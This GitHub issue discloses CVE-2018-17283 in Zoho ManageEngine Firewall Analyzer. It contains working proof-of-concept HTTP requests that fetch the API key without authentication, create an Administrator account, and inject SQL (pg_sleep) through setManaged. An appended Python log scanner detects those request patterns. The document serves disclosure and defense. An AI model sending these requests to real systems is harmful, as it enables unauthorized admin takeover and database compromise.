[CVE-2018-17283] Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection #4

Open
x-f1v3 opened this issue Sep 20, 2018 · 0 comments

x-f1v3 commented Sep 20, 2018

Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection

Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing from DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

Firewall Analyzer 12.3 Build 123183 has a permission bypass vulnerability which can lead to information disclosure and SQL injection.

Proof of Concept:

Getting the API key without authorization:

```
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
```

Local site test: [image]

Adding an admin user using only the API key (PoC):

```
POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&userName=test1@test.com&privilege=Administrator&emailId=test@test.com&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close

-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="password"

test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"

undefined
-----------------------------195342410120122--
```

Local site test: [images]

SQL injection using only the API key (PoC):

```
POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

name=KcP7OGhC';select%20pg_sleep(1);%20-- 
```


x-f1v3 changed the title from "Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection" to "[CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection" on Sep 29, 2018
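
A defender-side check for the request pattern in this report, as an added example that is not part of the original issue or of the product's code: it scans web access logs for requests to the `getAPIKey` servlet action and for `apiKey`-authenticated API calls made by the same client afterwards. The Combined Log Format, the sample lines, the `scan` function and the rule names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Combined Log Format (an assumption; adapt LINE_RE
# to whatever your server or reverse proxy writes). REDACTED is a placeholder.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Sep/2018:10:00:01 +0000] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Sep/2018:10:00:05 +0000] "POST /api/json/v2/admin/addUser?apiKey=REDACTED&userName=test1@test.com&privilege=Administrator HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.4 - - [20/Sep/2018:10:01:00 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Sep/2018:10:02:00 +0000] "POST /api/json/device/setManaged?apiKey=REDACTED&manage=false HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.4 - - [20/Sep/2018:10:03:00 +0000] "POST /api/json/device/setManaged?apiKey=REDACTED&manage=true HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

# Captures: client IP, HTTP method, request target.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def scan(log_text):
    """Return (line_no, client_ip, rule) for requests matching this report's pattern."""
    key_fetchers = set()  # clients seen requesting the API key servlet action
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, _method, target = m.groups()
        url = urlsplit(target)
        path, qs = url.path.lower(), parse_qs(url.query)
        if path == "/oputilsservlet" and "getAPIKey" in qs.get("action", []):
            key_fetchers.add(ip)
            findings.append((line_no, ip, "apikey-fetch"))
        elif path.startswith("/api/json/") and "apiKey" in qs:
            if path.endswith("/admin/adduser") and "Administrator" in qs.get("privilege", []):
                findings.append((line_no, ip, "admin-user-added-via-apikey"))
            elif ip in key_fetchers:
                findings.append((line_no, ip, "api-call-after-apikey-fetch"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs do not record POST bodies, so the `name` parameter used in the SQL injection request is only visible where request bodies are captured, for example at a WAF or reverse proxy.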